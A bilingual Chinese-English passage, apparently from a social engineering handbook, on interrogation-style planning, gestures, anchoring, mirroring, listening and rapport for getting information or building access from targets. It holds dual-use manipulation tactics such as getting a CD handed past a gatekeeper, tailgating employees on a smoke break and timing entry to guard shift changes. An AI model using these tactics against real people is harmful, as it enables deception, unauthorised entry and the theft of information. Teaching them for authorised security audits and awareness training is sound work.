  • Wedging the alibi: A suspect seldom confesses his transgressions all at once. Getting him to make minor admissions, such as he was on the site, owned the weapon in question, or owned a similar car, can move him toward admitting more and more, eventually leading to a complete confession.
  •  
 

 
 

也许您在进行社会工程工作时被拦在门口,守门人拒绝您进入大楼。看看您是否可以通过以下方式“获得进入权”:“我知道史密斯先生很忙,不能与我会面。您介意把这张有关我们产品的 CD 给他吗?我会在今天晚些时候或明天打电话跟进。”

Maybe you get stopped at the door during a social engineering gig and the gatekeeper refuses you access to the building. See whether you can “gain access” by using a line like this: “I understand Mr. Smith is busy and can’t meet with me. Would you mind giving him this CD of information about our products and I will follow up with a phone call later on today or tomorrow?”

 
 

这是一个较小的承认,但尽管如此,如果不是你,那么你的一个工具也会被打开。

It is a lesser admission, but nevertheless would get if not you, then one of your tools in the door.

 
 

最终目标

The End Goal

 

为了准备使用适当的采访或审讯策略,作为一名社会工程师,您可能需要回答一些自己的问题。我鼓励您将这些问题写在记事本上,因为这样做可以帮助您为与目标的会面做好准备。此外,写下您的答案可以使它们变得真实,并为您提供了在准备审讯期间可以采取的行动。

To prepare to use proper interview or interrogation tactics, as a social engineer you may want to answer a few questions of your own. I encourage you to write these down in a notepad because doing so can help you prepare for your encounter with the target. Plus, writing down your answers makes them real and gives you a path to work on during the preparation for your interrogation.

 

回答这些问题:

Answer these questions:

 
 
     
  • 谁:审讯或会面的对象是谁?他扮演什么角色?列出姓名、头衔以及与审讯相关的其他信息。
  • Who: With whom is the interrogation or encounter being conducted? What role does he play? List names, titles, and other information about him that is relevant to the interrogation.
  •  
     
  • 什么:到底做了哪些准备?审讯期间你的目标是什么?你必须有一个明确的目标。
  • What: Exactly what preparation has been done and what is going to be your goal during the interrogation? You must have a definite aim.
  •  
     
  • 时间:审讯的时间范围是什么时候?白天或晚上的什么时间?公司的情况如何导致你决定何时采取行动?你听到过有人开派对吗?是在大部分员工休假的时候吗?是在午餐时间吗?是在保安人员换岗的时候吗?
  • When: What is the timeframe of the interrogation? What time of day or night? What are the circumstances at the business that lead to this decision about when to make your move? Is there a party you overheard about? Is it a time when a large portion of the employees are on vacation? Is it during lunch time? Is it during the changing of the security staff?
  •  
     
  • 地点:审讯地点在哪里?你会去目标所在地吗?你会跟踪这个人去健身房、当地酒吧还是托儿所?从目标那里获取所需信息的最佳地点在哪里?
  • Where: What is the location of the interrogation? Are you going to be at the target’s location? Are you tracking the person to his or her gym, local bar, or daycare? Where is the best place to try to obtain the information you need from the target?
  •  
     
  • 为什么:人们经常从孩子那里听到这个问题,但必须问。这次审讯的目的是什么?是让目标承认某物的位置?是让他透露不该透露的信息?还是让你进入房间或​​服务器?
  • Why: People hear this question often enough from their kids, but it must be asked. What is the purpose of this interrogation? To make the target admit to the location of something? To make him give out information he should not? For you to gain access to a room or a server?
  •  
     
  • 如何:你将在这次审讯中使用什么方法?NLP?嵌入式命令?人类缓冲区溢出(本章末尾讨论)?微表情?
  • How: What methods will you use in this interrogation? NLP? Embedded commands? Human buffer overflow (discussed at the end of this chapter)? Microexpressions?
  •  
 

当然,刑事审讯的目的是让嫌疑人认罪。而社会工程学审讯的目的是让嫌疑人认罪,但认罪的方式有所不同。你希望嫌疑人愿意向你提供信息,使用前面讨论过的审讯策略可以让这一点更容易实现。最终,你的社会工程学审讯应该像顺利的采访一样。然而,社会工程学审讯人员在对目标使用采访和审讯策略时,可以使用一些其他技巧来提供帮助。

Of course, in a criminal interrogation the goal is confession to a crime. With interrogation as a social engineer the goal is a confession of a different sort. You want people to feel comfortable giving you information, and using the interrogation tactics discussed earlier you can make that easier to do. In the end, your social engineering interrogations should be like smooth interviews. However, a social engineer can use some other techniques to help while using interview and interrogation tactics on a target.

 

手势

Gesturing

 

由于手势在很大程度上取决于文化,因此手势的种类繁多。与普遍存在的微表情不同,美国的手势在世界其他地方可能被视为侮辱,或者根本没有任何意义。

Gestures have a wide variation due to the fact that they are very much culturally dependent. Unlike microexpressions, which are universal, gestures from the United States can actually be insulting in other parts of the world, or have no meaning at all.

 

这里有一个练习,可以帮助您更好地理解手势差异。如果您愿意,可以写下您的答案,以便在几分钟内参考。根据您来自的文化,答案会很有趣。

Here is an exercise to help you better understand gesturing differences. If you want you can write down your answers to refer to in a few minutes. Depending on what culture you’re from, the answers will be interesting to see.

 

写下你认为这个手势的含义以及在每种情况下它是否不礼貌:

Write down what you think this gesture means and whether it is rude in each case:

 

1.手掌向上,用食指向某人招手。

2.用食指和中指做出“V”字形手势。

3.坐着时脚底露出来。

4.用手指做出“OK”的手势。

5.挥动一只手,手掌朝外。

6.上下点头。

1. Holding your palm facing upward, point at someone with your index finger and beckon to him.

2. Make a “V” sign with your index and middle fingers.

3. Sit with the soles of your feet showing.

4. Make the “ok” symbol with your fingers.

5. Wave a hand with your palm facing outward.

6. Nod your head up and down.

 

如果您写下了您的答案,请将它们与以下一些有趣的文化差异进行比较:

If you wrote down your answers, compare them to some of the following interesting cultural differences:

 

1.在美国,这个手势的意思只是“过来”,但在中东或远东、葡萄牙、西班牙、拉丁美洲、日本、印度尼西亚和香港,以这种方式招手会被认为是粗鲁或侮辱。手掌朝下并用所有手指招手更能被接受。

2.在美国,这个手势是“和平手势”,但在欧洲,它表示“胜利”。如果你将手掌朝向脸部,它实际上表示“推开它”。

3.在美国,这是一种舒适的坐姿,并不代表任何恶意。但在其他国家,如泰国、日本、法国以及中东和近东国家,露出脚底则表示不尊重。暴露身体最低、最脏的部分是一种侮辱。

4.在美国,这个手势表示一切都好。但在世界其他地方,它的含义则大不相同。在巴西和德国,这是一个粗俗的手势;在日本,它表示“钱”;在法国,它表示“一文不值”。

5.在美国,这是一句问候语,表示你好或再见。在欧洲,它表示“不”,而在尼日利亚,它是一种严重的侮辱。

6.在美国,点头是表达“是”的一种方式。很多地方也是这样,但在某些地区,比如保加利亚或希腊,点头是表达“不”的一种方式。

1. In the U.S. this gesture simply means “Come here,” but in the Middle or Far East, Portugal, Spain, Latin America, Japan, Indonesia, and Hong Kong, beckoning someone this way is considered rude or insulting. Beckoning someone with the palms facing down and using all the fingers to beckon is more acceptable.

2. In the U.S. this gesture is a “peace sign,” but in Europe it means “victory.” If you put the palm toward your face it actually means, “Shove it.”

3. In the U.S. this is a comfortable way of sitting and doesn’t denote any bad intent. Yet in other countries, such as Thailand, Japan, and France, as well as countries of the Middle and Near East, showing the soles of the feet demonstrates disrespect. Exposing the lowest and dirtiest part of your body is insulting.

4. In the U.S. this gesture means everything is okay. But in other parts of the world it has much different meaning. In Brazil and Germany it is an obscene gesture, in Japan it means “money,” and in France it means “worthless.”

5. In the U.S. this is a greeting, a way to say hello or good-bye. In Europe it can mean “no,” and in Nigeria it is a serious insult.

6. In the U.S. nodding your head is a way of saying “yes.” The same is true for many places, but in some areas, such as Bulgaria or Greece, it is a way of saying “no.”

 

这些只是手势的几个例子,根据您所在的位置或与您交谈的对象,这些手势可能具有不同的含义。了解手势的不同含义非常重要,因为沟通往往不仅仅是说了什么。

These are just a few examples of gestures that can have varying meanings depending on where you are or who you are talking to. Understanding the different meanings of gestures is important because communication is often much more than what is said.

 

本节旨在说明,在与目标互动期间,不仅可以遵守这些原则,还可以利用这些原则来操纵目标,使其走上阻力最小的道路。了解目标的文化也会阻止你做出可能导致不良后果的举动。

This section is intended to show that, during an interaction with a target, not only can these principles be observed but they can also be utilized to manipulate the target into a path of least resistance. Understanding the culture of the targets you approach will also keep you from performing a gesture that can have undesirable results.

 

锚定

Anchoring

 

正确使用手势可以产生强大的效果。其中一些原则来自 NLP 研究,但当您试图让目标的思维走上您控制的道路时,手势可以发挥很大的作用。

Gestures can have some powerful effects when used properly. Some of these principles come from the study of NLP but can have a lot of power when you’re trying to set your target’s mind on a path you control.

 

其中一种方法就是锚定,即用某种手势将同类的陈述联系起来。例如,如果你正在与目标交谈,而他描述了一些积极和美好的事情,你可以用右手做手势重复他的话。如果是坏事,你可以只用左手做手势。做几次这个手势后,你就会开始在目标的脑海中“锚定”右手手势与好事有关。

One such method is anchoring, which is a method of linking statements of a like kind with a certain gesture. For example, if you are talking to a target and he describes something positive and good, you can repeat it back while gesturing with your right hand only. If it is something bad you can gesture with your left hand only. After doing this gesture a few times you begin to “anchor” in your target’s mind that right-handed gestures are linked to good things.

 

销售人员使用这种方法进一步巩固“他们的产品”或“他们的服务”是优秀的,而竞争对手的不是。一些政客使用这种方法通过某些手势来巩固积极的想法或他们希望观众认为是积极的想法。比尔·克林顿就是一个理解这一点的很好的例子。要查看此方法的实际应用(尽管不是前总统克林顿),请访问www.youtube.com/watch?v=c1v4n3LKDto&feature=player_embedded

Salespeople use this method to further solidify that “their product” or “their service” is excellent and the competitor’s is not. Some politicians use this method to anchor positive thoughts or thoughts they want their audience to think of as positive with certain gestures. Bill Clinton was a great example of someone who understood this. To see this in action (albeit not former President Clinton) visit www.youtube.com/watch?v=c1v4n3LKDto&feature=player_embedded.

 

镜像

Mirroring

 

另一种与手势有关的策略称为镜像,即尝试将自己的手势与目标的个性相匹配。当然,这并不像听起来那么容易。但仅从观察中你能辨别出目标的什么呢?她胆小吗?他是否大声而外向?如果你用大而响的手势接近胆小的人,你肯定会吓跑她,并且可能会毁掉你进行社会工程尝试的机会。同样,如果你比较胆小,那么在与“大声”的人打交道时,你需要镜像“大声”的手势。镜像不仅包括模仿目标的肢体语言,还包括使用让对方容易听到你说话的手势。

Another tactic when it comes to gestures is called mirroring, where you try to match your gestures to the personality of the target. Of course, this is not as easy as it sounds. But what can you discern about the target from just observation? Is she timid? Is he loud and outgoing? If you approach a timid person with large, loud gestures you will surely scare her off and potentially ruin your chances of making your social engineering attempt. By the same token, if you are more timid you will need to mirror “louder” gestures when dealing with “louder” people. Mirroring not only involves mimicking a target’s body language but also using gestures that make it easy for a person to listen to you.

 

你可以将这一原则提升到另一个层次。看到目标熟悉的手势可以让他感到安慰。但是,你必须小心地保持平衡,因为如果你的目标似乎经常使用某种手势,而你也以完全相同的方式使用它,那么你就有可能激怒他。你想模仿他,但又不能完全模仿。如果目标用手托住下巴来结束思考,你可以用手托住脸的另一部分来结束思考,或者举起一根手指轻敲下巴几次。

You can take this principle to another level. Seeing gestures a target is familiar with can be comforting to him or her. However, you must strike a careful balance, because if your target has a particular gesture he seems to be using a lot and you use it exactly the same way, then you run the risk of irritating him. You want to mirror him, but not exactly. If the target ends a thought by placing his hand on his chin you can end a thought by placing your hand on another part of your face or raise a finger to tap your chin a couple times.

 

以下部分通过讨论目标手臂和手的位置和放置的重要性,进一步分析手势这个主题。

The following section analyzes the topic of gesturing a bit further by discussing the importance of the position and placement of a target’s arms and hands.

 

手臂和手的位置

Arm and Hand Placement

 

执法人员受过训练,在面谈和审讯期间会注意手臂和手的位置。审讯期间动作或“坐立不安”的增加可能表明压力水平增加,表明审讯正在产生预期效果。当然,这是在执法环境中;在社会工程环境中,你会注意这些相同的迹象,但目标的压力迹象可能表明你需要退缩(除非你的目标是让他或她感到压力)。

Law enforcement officers are trained to notice the placement and position of the arms and hands during both interviews and interrogations. An increase in movement or “fidgeting” during an interrogation can show an increase in stress levels, signifying that the interrogation is having the desired effect. This is, of course, in a law enforcement setting; in a social engineering setting you would watch for these same signs, but signs of stress in the target might indicate you need to back off (unless your goal is to stress him or her out).

 

某些执法人员被教导要注意以下几个迹象:

Certain law enforcement officers are taught to pay attention to a couple of signs:

 
 
     
  • 当一个人放松时,肘部通常会自由地垂在身体旁边。当你感到受到威胁或害怕时,你的身体自然的反应是将肘部拉向肋骨。本质上,这个姿势是对可能受到威胁的内脏器官的一层保护。
  • Elbows generally hang free next to the body when a person is relaxed. When you feel threatened or scared your body’s natural reaction is to pull the elbows in towards the rib cage. In essence this position serves as a layer of protection to one’s internal organs that might be threatened.
  •  
     
  • 手势通常也能揭示很多信息。目标可能会用手势描述某事,但不会说出来。例如,在犯罪审讯中,嫌疑人可能会做出描述该行为的手势(即勒死、射击、刺伤等),但只会说犯罪事件这个词。观察目标可能使用的细微手势很重要。
  • Hand gestures often can be very revealing, too. A target may describe something with his hands that he doesn’t say. For example, in a crime interrogation suspects may make a gesture that describes the activity (that is, strangling, shooting, stabbing, and so on) but just say the word crime or incident. Watching for the subtle hand gestures your target may use is important.
  •  
 

注意目标感到受到威胁或害怕的迹象可以帮助您进行调整并让他们恢复平静。当您接近目标时,在说出第一个字之前,肢体语言、手臂和手势就可以传达很多信息。

Taking note of signs that the target is feeling threatened or scared can help you to adjust and put them back at ease. When you approach a target, much can be said with body language and arm and hand gestures before the first word is even spoken.

 

其他需要注意的手势包括:

Other gestures to take notice of include:

 
 
     
  • 张开的手掌可能表示真诚。
  • An open palm might indicate sincerity.
  •  
     
  • 竖起尖塔状的手指可能表明此人富有权威感。
  • Steepled fingers could indicate the person feels authoritative.
  •  
     
  • 敲击或敲击手指可能表示焦虑。
  • Tapping or drumming fingers can indicate anxiety.
  •  
     
  • 触摸脸部可能表示思考;触摸头发可能表示不安全感;触摸耳朵可能表示犹豫不决。
  • Touching the face can indicate thought; touching hair can indicate insecurity; and touching ears can indicate indecisiveness.
  •  
 

注意目标的这些手势可以让你了解他的心态。另一方面,如果这是你的借口,做出这些手势可以帮助你塑造这些形象之一。

Taking note of these gestures in your target can tell you a lot about his mindset. On the other hand, performing these gestures can help you to portray one of these images if this is your pretext.

 

从社会工程学的角度来看,以下是有关手势的几个关键点,如果你像我一样是一个“大”手势爱好者,这些要点就至关重要:

From a social engineering standpoint here are a few key points about gestures, which can be imperative if you are a “big” gesturer like me:

 
 
     
  • 没有人应该记住这个手势,而应该记住它所传达的信息。如果人们倾向于说“哇,那家伙的手势真多”,你需要冷静一点。重要的是信息,而不是手势。
  • No one should remember the gesture, but only the message attached to it. If people tend to say, “Wow, that guy gestures a lot” you need to calm down a bit. The message is important, not the gesture.
  •  
     
  • 避免千篇一律。即使是手势,你也可以表现得平淡、乏味、重复,因为手势会让目标对你的看法变得消极。
  • Avoid monotony. Even in gestures you can be so bland, boring, and repetitive that the gesture can adjust the target’s perception of you to be negative.
  •  
     
  • 一定要小心不要表现出焦虑,例如敲击手指或做出急促的动作。这些动作会让目标对象觉得你很紧张,从而影响你的表达。
  • Be very concerned about exhibiting anxiety, such as tapping or drumming your fingers or making jerky movements. They tell the target you are nervous and detract from your message.
  •  
     
  • 太多就不好了。过度的手势也会削弱你的信息。
  • Too much is too bad. Overgesturing can also detract from your message.
  •  
 

记住,使用面部表情、手势和姿势是一揽子计划。它们必须融为一体、保持平衡,并支持你的借口。

Remember that using facial expressions, gestures, and posture is a package deal. They must all blend together, be balanced, and support your pretext.

 

尽管这些信息很有用,但审讯武器库中的一个工具可以决定你在社会工程技能中运用这些信息的方式的成败。

As good as all this information is, one tool in the interrogation arsenal can make or break the way you use this knowledge in your social engineering skills.

 

倾听,迈向成功

Listening Your Way to Success

 

可能没有一项技能能像倾听一样包罗万象。倾听是社会工程师的重要组成部分。你必须意识到,听到倾听之间存在着巨大的差异。

Probably not one skill exists that can be as encompassing as listening. Listening is a major part of being a social engineer. What you have to realize is a major difference exists between hearing and listening.

 

人们普遍认为,人们能记住的不到他们所听到内容的 50%。这意味着如果你和一个人交谈十分钟,他只会记住你说的几分钟。尽管人们以这种方式勉强度过一生,但对于社会工程师来说,这是不可接受的。

It is commonly believed that people retain much less than 50% of what they hear. That means if you are talking to a person for ten minutes he will remember only a few minutes of what you said. Although people eke through life this way, it is not acceptable for a social engineer.

 

通常,所说的小事情可以决定你在社会工程学方面的成功与否。在这方面,你需要大大提高你的倾听技巧,不仅要听别人说什么,还要听别人怎么说、什么时候说、带着什么情绪说。所有这些因素都会影响你对所传递信息的理解。

Often the little things that are said can make or break how successful you are in a social engineering endeavor. This area is where massively improving your listening skills comes in, and not just listening to what is said, but how it is said, when it is said, and with what emotion. All of these factors contribute to your perception of the information relayed.

 

成为一名好的倾听者听起来很容易,但当你心情激动,你的最终目标是进入服务器机房,而你正在听几个出去抽烟的员工讲述故事,你打算跟随他们进入大楼时,真正的倾听就很难了。

Being a good listener might sound easy, but when you are in the heat of the moment, your end goal is to gain access to the server room, and you are listening to a story by a few employees out for a smoke break who you plan on following into the building, truly listening can be hard.

 

然而,正是在这些时候,你可能想要认真倾听。也许苏珊开始抱怨人力资源经理琼斯先生。她讲述了他最近对她有多不礼貌,以及她对此有多厌烦。然后她的烟友贝丝说:“你应该来会计天堂看看。那里也充满了混蛋。”

Yet it is during these times you might want to really listen. Maybe Susan starts to complain about her manager in HR, Mr. Jones. She tells a story about how short he has been with her lately and how she is fed up with it. Then her fellow smoker, Beth, says, “Well you should come over to the paradise of accounting. It is filled with jerks there, too.”

 

也许这听起来就像两个疲惫不堪、怒不可遏的员工在抱怨。或者不止如此?你知道他们的名字、经理的名字、他们所在部门的名称,以及一些员工的一般行为举止。如果你需要证明自己在大楼内的合法性,这些信息以后会非常有用。

Maybe this just sounds like the complaining chatter of two tired and ticked-off employees. Or is it more? You have both of their names, the name of a manager, the names of their departments, and some idea of the general demeanor of some of the employees. This information can be very valuable later on if you need to provide proof of your validity for being inside the building.

 

通常,一个人说话的方式可以告诉你很多关于这个人的信息,但要运用这一点需要大量的倾听。这个人是生气、悲伤还是快乐?她的语速是加快了还是放慢了?他情绪激动还是情绪消退了?有时,关注这些事情比只听单词能告诉你更多。

Often the way someone says something can tell you a lot about the person, but applying this will require a lot of listening. Is the person angry, sad, or happy? Did she speed up or slow down in her delivery? Did he get emotional or did his emotion trail off? Paying attention to these types of things can tell you a lot more than the words at times.

 

那么如何才能成为一名优秀的倾听者呢?

So how can you become a great listener?

 

以下步骤可帮助您完善聆听技巧。这些技巧不仅可以帮助您进行社会工程,还可以帮助您的生活,并且应用于社会工程审计可以产生巨大的影响。

The following steps can help you perfect your listening skills. These tips can assist you not only in social engineering but also in life, and when applied to a social engineering audit can make a world of difference.

 

1. 注意。过度关注你的目标。不要摆弄手机或其他小玩意。不要敲打手指。尽量专心听对方说话,看着对方。用一种非常好奇的方式,而不是用一种可怕的“我想跟踪你”的方式。

尽量不要提前思考,而要计划下一次回应。如果你计划下一次回应或反驳,你将无法集中注意力,你可能会错过一些重要的事情,或者让目标对象觉得你并不真正关心。这可能很难控制,所以对于大多数人来说,完善这种倾向需要付出一些认真的努力。

 

另外,尽量不要被环境因素分散注意力。背景噪音或一小群人笑着谈论某事可能会分散你的注意力;不要让这种情况发生。

 

最后,也要密切注意说话者没有说的话。肢体语言、面部表情和沟通的其他方面都应该认真“倾听”。

 

2. 证明你在倾听。用你的肢体语言和面部表情表现出开放和热情。偶尔点头,不要太频繁,但要足够频繁,让目标知道你在。你不想看起来像个摇头娃娃,但你想让目标知道你“和他在一起”。

不要忘记最重要的微笑。微笑可以告诉对方你在精神上和他在一起,你明白他在说什么。正如前面提到的注意倾听一样,在适当的时候加上一丝微笑。如果对方告诉你她的狗刚刚死了,点头和微笑很可能不会有任何效果。

 

3. 提供有价值的反馈。用个人信仰和经验过滤信息的做法太常见了。如果你这样做,你可能没有真正“听到”说话者在说什么。

一定要问相关问题。如果她告诉你关于蓝天的事,那么你说“那么天空有多蓝?”是没有效果的。你的问题必须表明你一直在积极倾听,并渴望获得更深入的了解。

 

时不时地复述或总结你所听到的内容也是不错的选择。不要像读书报告一样背诵对话,但重述一些主要思想可以帮助目标对象看到你与信息一致。

 

4. 不要打断。这个技巧无需多言。打断对方的话会显得你不关心他的感受,会打断他的思路。最好等他说完再说。

然而,在某些情况下,打断是有用的,甚至是一种策略。如果你想看一个例子,请观看电影《潜行者》。当罗伯特·雷德福试图进入一扇必须按门铃才能进入的锁着的门时,他打断了门卫,后者正在为一些送货物品而激烈争吵。他这样做了几次,最终让门卫感到沮丧,并让他未经授权就打开了门。如果你认为打断能让你有所收获,那么打断可能是一个好主意。然而,大多数时候,事实并非如此。

 

5. 适当回应。这是倾听技巧的精髓。如果你专注于反驳或下一句话,或者想着刚刚走过的那个非常迷人的金发女郎,你可能会说错话。

1. Pay attention. Give your target your undue attention. Do not fiddle with your phone or other gadget. Do not drum or tap your fingers. Try to focus intently on what is being said, looking at the person speaking. Do this in a very inquisitive way, not in a scary, “I want to stalk you” way.

Try hard not to think ahead and plan your next response. If you are planning your next response or rebuttal you will not be focused, and you may miss something important or give the target the impression you don’t really care. This can be very hard to control, so perfecting this tendency will take some serious work for most people.

 

Also try to not be distracted by environmental factors. Noise in the background or a small group laughing about something can shift your focus; do not allow that to happen.

 

Finally, pay close attention to what the speaker is not saying, too. The body language, facial cues, and other aspects of communication should be “listened” to intently.

 

2. Provide proof that you are listening. Be open and inviting with your body language and facial expressions. Nod once in a while, not too often, but often enough to let the target know you are there. You don’t want to look like a bobble head doll, but you want to let the target know you are “with him.”

Don’t forget the all-important smile. Smiling can tell the target you are with him mentally and you understand what he’s saying. As with paying attention mentioned earlier, add small smiles when appropriate. If the person is telling you her dog just died, nodding and smiling will most likely get you nowhere.

 

3. Provide valuable feedback. Letting your personal beliefs and experiences filter the message coming your way is all too common. If you do that you may not truly “hear” what the speaker is saying.

Be sure to ask relevant questions. If she is telling you about the blue sky then you say, “So how blue was the sky?” will not be effective. Your questions must show you have been actively listening and have the desire to gain a deeper understanding.

 

Every now and then mirroring or summarizing what you have heard can work well, too. Don’t recite the conversation like a book report, but recapping some of the main thoughts can help the target see you are in tune with the message.

 

4. Do not interrupt. Not much more needs to be said on this tip. Interrupting your target shows a lack of concern for his feelings and stops the flow of thoughts. Letting him finish and then speaking is better.

However, circumstances do exist where interrupting can be useful or even a tactic. If you want to see an example, watch the movie Sneakers. When Robert Redford is trying to gain access to a locked door that he must be buzzed into, he interrupts the doorman in a heated dispute over some delivery items. He does so a few times, eventually frustrating the doorman and causing him to unlock the door with no authorization. If you think it will get you somewhere, interrupting might be a good idea. Most of the time however, it is not.

 

5. Respond appropriately. This is the pinnacle of good or bad listening skills. If you were focused on your rebuttal or next statement, or you were thinking about the very attractive blonde that just walked by, you might put your foot in your mouth.

 

有一次,我培训了一群人,告诉他们一些非常详细的操纵策略。我可以看出有两个人没有听。我随意地想了想,“那么,你就把狮子放在 350 度的温度下烤 15 分钟,直到酥脆。”其他人都大笑起来,我转向其中一个人说:“你觉得怎么样,约翰?”他茫然地看着我,结结巴巴地说:“嗯,是的,听起来很完美。”

I was once training a group of people and was telling them some aspects of very detailed manipulation tactics. I could tell two guys were not listening. I put in a random thought like, “So then you bake the lion at 350 degrees for 15 minutes til crispy.” The rest of the group broke out in laughter and I turned to one of the two and said, “What do you think, John?” He responded with a blank stare and a stuttered, “Um, yah, sounds perfect.”

 

永远不要对目标这样做。这对融洽关系来说是致命的打击(本章后面会讨论)。与目标交谈时,要尊重对方,控制自己的情绪,并始终做出适当的回应。

Do not ever do that to a target. It is a death blow to rapport (discussed later in this chapter). Be respectful, keep your emotions in check, and respond appropriately at all times when conversing with a target.

 

集中注意力、提供证据、给予积极反馈、注意不打断对方以及做出适当回应,这些都可能决定你的倾听能力。这些能力在长期的社会工程活动中尤其有用,比如,我在商会社交聚会上与一位绅士互动时,在酒吧“遇见”他,然后和他谈论他的生意。我所寻求的大部分信息在正常的、平凡的谈话中就会泄露。在谈话开始之前,一定要在家里或办公室练习这些技巧。你要让良好的倾听成为你的第二天性,成为你的才能库的一部分,而不是你必须思考的事情。

Paying attention, providing proof, giving positive feedback, being careful to never interrupt, and responding appropriately can make or break you when it comes to listening. They especially come into play during extended social engineering engagements, such as when I had to interact with the gentlemen at the Chamber of Commerce social gathering by “meeting” him at the bar and then talking to him about his business. Much of the information I was seeking would have been divulged in normal, mundane conversation. Make sure you practice these tips at home or the office before the time comes for the conversation to take place. You want good listening to become second nature as part of your arsenal of talents, not something you have to think about.

 

倾听时,你必须考虑自己的情绪。例如,我在一个严格的、宗教化的意大利家庭长大。我被教导不要不尊重女性,我很害怕告诉你,有一次我骂了我妈妈一个贬义的名字。我会告诉你,那对我来说没有好结果。那件事发生多年后的一天,我正在和一个人交谈,我想从他那里得到一些信息。我在社交场合接近他,我们开始了交谈。他开始谈论一个和他一起工作的女人,方式非常不恰当。我是这样长大的,我发现自己内心充满了愤怒。我很难抑制这些情绪,这一定表现在我的脸上和身体语言上,导致那个特定的向量被吹走了。从那次失败中,我学到了一个非常宝贵的教训——在社会工程活动中倾听时,你必须尽最大努力不要让你的内置过滤器妨碍你。

Your own emotions are another aspect of listening you must take into account. For example, I was raised in a strict, religious Italian family. I was taught that you didn’t disrespect women, and I shudder to tell you of the one time I called my mom a disparaging name. I will tell you that it did not end too well for me. One day many years after that incident, I was working an engagement and was talking with a guy from whom I was trying to obtain some information. I approached him in a social setting and we started a conversation. He started to talk about a woman he worked with, in a very inappropriate way. Being raised the way I was, I found a lot of anger boiling up inside me. I had a hard time containing those feelings and it must have shown on my face and in my body language, leading to that particular vector being blown. In that failure I learned a very valuable lesson—when it comes to listening during social engineering engagements, you must try your hardest to not let the built-in filters you have get in the way.

 

另外,请记住要对信息做出反应,而不是对人做出反应。如果你不同意某人的信仰或立场,那么给予他或她尊严将大大有助于让那个人对你感到舒服。即使在你可能不同意的情况下,你也可以找到一些富有同情心的话来表达。例如:

Also, remember to react to the message, not the person. If you don’t agree with a person’s beliefs or stance, affording him or her dignity will go a long way in making that person feel comfortable with you. Even in situations where you might not agree you can find something empathic to say. For example:

 

目标: “这份工作太糟糕了。他们让我干这种糟糕的工作,而且工资还很低。”

Target: “This job stinks. They make me work this horrible shift and for low pay, too.”

 

SE: “在我看来,你似乎对现在的处境感到不知所措。”

SE: “It sounds to me like you are overwhelmed by your situation here.”

 

尽管您可能想着“再努力一点”,但通过这种方式回应,您可以让目标对象知道您正在倾听,并且同情她的生活困境。

Although you might be thinking “Try Harder,”™ by responding this way you let the target know you were listening, as well as empathizing with her plight in life.

 

这种技术被称为反射性响应。反射性响应有一些基本原则:

This technique is known as reflective responding. Reflective responding has some basic principles to it:

 
 
     
  • 如前所述,积极倾听。
  • Listen actively, as described earlier.
  •  
     
  • 回答时,要注意自己的情绪。了解对方说话时的感受可以帮助你做出正确的反应。
  • When it’s time to respond, be aware of your emotions. Knowing what you feel as the target is speaking can help you to react properly.
  •  
     
  • 重复内容,不要像鹦鹉一样,而是用你自己的语言。
  • Repeat the content, not like a parrot, but in your words.
  •  
     
  • 用一个不置可否的短语开始你的回答,例如“听起来像”、“似乎像”或“看起来好像”。这些短语可以缓和你想要传达的信息。如果你需要证据,下次你和你的伴侣、老板、父母或任何人发生争执时,可以说“你生我的气是因为……”,然后将对方的反应与你说“看起来你生气是因为……”时的反应进行比较。你会看到哪一个更能被接受。
  • Start your response with a non-committal phrase such as, “It sounds like,” “It seems like,” or “It appears that.” These phrases ease the message you are trying to deliver. If you need proof of this, the next time you get into an argument with your mate, boss, parents, or whomever say, “You are mad at me because…” and compare the person’s reaction with what you get when you say “It appears you are mad because of…” instead. You will see which one is taken better.
  •  
 

反思性回应与积极倾听相结合,在信任和融洽关系建立技能领域具有非常致命的力量。

Reflective responding used with active listening is a very deadly force in the trust and rapport-building skills arena.

 

随着你学会更好地倾听,倾听成为你天性的一部分,你对所听到的信息做出反应的能力也会增强。社会工程师的目标是收集信息、访问你不应该访问的地方或事物,或者迫使目标采取他不应该采取的行动。认为自己必须完美地操纵他人往往会阻止人们学习和练习出色的倾听技巧,但这正是你需要成为一名优秀倾听者的确切原因。

As you learn to listen better and it becomes part of your nature you will enhance your ability to react to the message you hear. A social engineer’s goal is to gather information, gain access to someplace or something you should not have access to, or cause the target to take an action he should not take. Thinking that you must be perfect at manipulation often stops people from learning and practicing great listening skills, but this is the exact reason you need to be a great listener.

 

请考虑以下两种情况:

Consider these two scenarios:

 
 
     
  • 你的一位邻居过来问你是否有时间帮他清理车库里的一项工程,大约一个小时。这位邻居养了一条狗,它几次钻进你的垃圾堆,而且喜欢把你的院子当成厕所。漫长的一天结束后,你正准备坐下来放松一下,看看电视或读本书。
  • One of your neighbors comes over and asks whether you have time to help him with a project in his garage for about an hour. This neighbor has a dog that has gotten into your garbage a few times and tends to like to use your yard as a bathroom. You are just about to sit down to relax at the end of a long day and watch some TV or read a book.
  •  
     
  • 你的儿时玩伴过来告诉你,他需要帮忙搬动一些家具。他刚搬到离你大约五英里的地方,无法把沙发搬上楼梯。你正准备坐下来休息一会儿。
  • Your childhood friend comes over and tells you that he needs some help moving some furniture. He just got a place about five miles from you and he can’t get the couch up the stairs. You are just about to sit down to relax a bit.
  •  
 

在哪种情况下,您更有可能放弃放松?大多数人会在第二种情况下放弃放松,但会找借口或理由不在第一种情况下帮忙,或至少尝试将其推迟到他们不“忙”的另一天。

For which scenario are you more likely to put aside relaxing? Most people will put aside relaxing for the second scenario, but will come up with an excuse or reason to not help out in the first scenario or at least try to postpone it to another day when they are not “busy.”

 

为什么?人们在朋友面前非常开放和自由。当你和某人相处得舒服时,你不会有任何界限,有时会放下自己的欲望和需求来帮助他们。人们自然会相信朋友的信息,而面对陌生人,人们可能会开始猜测对方所说的话,试图确定它是否真实。在与朋友的关系中,这种联系被称为融洽关系

Why? People are very open and free with friends. When you feel comfortable with someone, you have no boundaries and will put aside your own wants and needs at times to help them out. One naturally trusts the message coming from a friend, whereas with the stranger one might start to double-guess what’s being said, trying to determine whether it is truthful or not. In the case of the relationship with the friend, this connection is called rapport.

 

多年来,人们只在谈论销售人员、谈判人员等时才谈论融洽关系。融洽关系不仅适用于销售人员;它是任何人都可以使用的工具,尤其是社交工程师。如果您想知道如何立即建立融洽关系,请继续阅读。

For years rapport has only been talked about when it comes to salespeople, negotiators, and the like. Rapport isn’t just for salespeople; it is a tool that anyone can use, especially the social engineer. If you are wondering how to build rapport instantly, then read on.

 

建立即时融洽关系

Building Instant Rapport

 

我以前的同事托尼曾经说过,建立融洽关系比呼吸更重要。我并不真的相信这是真的,但这句话确实有道理,因为建立融洽关系至关重要。

